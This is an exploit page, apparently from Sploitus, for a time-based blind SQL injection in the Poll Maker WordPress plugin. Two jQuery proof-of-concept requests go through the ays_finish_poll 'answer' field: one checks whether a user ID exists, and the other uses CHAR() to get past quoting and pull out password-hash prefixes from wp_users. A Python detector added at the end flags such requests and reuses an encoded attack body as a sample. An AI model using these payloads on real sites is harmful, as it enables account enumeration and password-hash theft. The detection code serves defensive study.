## https://sploitus.com/exploit?id=WPEX-ID:24F933B0-AD57-4ED3-817D-D637256E2FB1
This requires a valid nonce, which can be obtained by loading a page with a published poll and reading the value of the `ays_finish_poll` hidden input.

PoC 1: If a user with ID 1234 exists, this request takes around 10 seconds to return; if not, it returns quickly.

```javascript
jQuery.post(poll_maker_ajax_public.ajax_url,{answer:["12345) UNION SELECT 1,1,1,0,1,NULL,0,1,1 FROM wp_users WHERE ID=1234 AND SLEEP(10) AND user_status IN (0"],ays_finish_poll:"NONCE",action:"ays_finish_poll",poll_id:"3",end_date:"2021-08-18+22:11:27"})
```

PoC 2: This uses built-in MariaDB functions to bypass magic quotes. `CHAR(36,80,36,66,37 USING utf8)` evaluates to `$P$B%` (used here as a LIKE pattern). If this request takes more than 10 seconds to return, there is probably a user with ID 1 whose password hash starts with `$P$B`.

```javascript
jQuery.post(poll_maker_ajax_public.ajax_url,{answer:["12345) UNION SELECT 1,1,1,0,1,NULL,0,1,1 FROM wp_users WHERE ID=1 AND user_pass LIKE CHAR(36,80,36,66,37 USING utf8) AND SLEEP(10) AND user_status IN (0"],ays_finish_poll:"NONCE",action:"ays_finish_poll",poll_id:"3",end_date:"2021-08-18+22:11:27"})
```
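As an added defensive example (not part of the original advisory or the plugin's code), the check below inspects a URL-encoded POST body for the request shape the two PoCs use: a legitimate `ays_finish_poll` submission carries only integer answer IDs, so any non-numeric value in `answer[]` is already suspicious, and the SQL markers from the PoCs add detail for triage. It assumes jQuery serialises `answer:[...]` as `answer[]=...` and that the body is the one received by `admin-ajax.php`; the sample bodies are constructed, with a placeholder nonce.

```python
"""Request-body check for the Poll Maker ays_finish_poll injection shape."""
import re
from urllib.parse import parse_qs

# Indicator substrings taken from the PoCs on the page (matched case-insensitively).
INJECTION_MARKERS = ("union select", "sleep(", "using utf8", "from wp_users")


def inspect_finish_poll(body: str) -> dict:
    """Classify one URL-encoded POST body sent to admin-ajax.php.

    Returns {"relevant": bool, "suspicious": bool, "reasons": [...]}.
    Only action=ays_finish_poll requests are relevant; for those, every
    answer value must be a short run of digits (a poll answer ID).
    """
    params = parse_qs(body, keep_blank_values=True)
    action = params.get("action", [""])[0]
    if action != "ays_finish_poll":
        return {"relevant": False, "suspicious": False, "reasons": []}

    reasons = []
    # jQuery serialises answer:["..."] as answer[]=...; accept the bare form too.
    for value in params.get("answer[]", []) + params.get("answer", []):
        if not re.fullmatch(r"\d{1,10}", value):
            reasons.append(f"non-numeric answer id: {value[:40]!r}")
        lowered = value.lower()
        for marker in INJECTION_MARKERS:
            if marker in lowered:
                reasons.append(f"marker {marker!r} in answer")
    return {"relevant": True, "suspicious": bool(reasons), "reasons": reasons}


# Constructed sample bodies (not captured traffic); "abc123" stands in for a nonce.
BENIGN_BODY = ("answer%5B%5D=12345&ays_finish_poll=abc123&action=ays_finish_poll"
               "&poll_id=3&end_date=2021-08-18+22%3A11%3A27")
ATTACK_BODY = ("answer%5B%5D=12345%29+UNION+SELECT+1%2C1%2C1%2C0%2C1%2CNULL%2C0%2C1%2C1"
               "+FROM+wp_users+WHERE+ID%3D1234+AND+SLEEP%2810%29+AND+user_status+IN+%280"
               "&ays_finish_poll=abc123&action=ays_finish_poll"
               "&poll_id=3&end_date=2021-08-18+22%3A11%3A27")

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("attack", ATTACK_BODY)):
        print(label, inspect_finish_poll(body))
```

A hit on the non-numeric check alone is enough to block or alert; the marker reasons only help an analyst see which PoC variant was used.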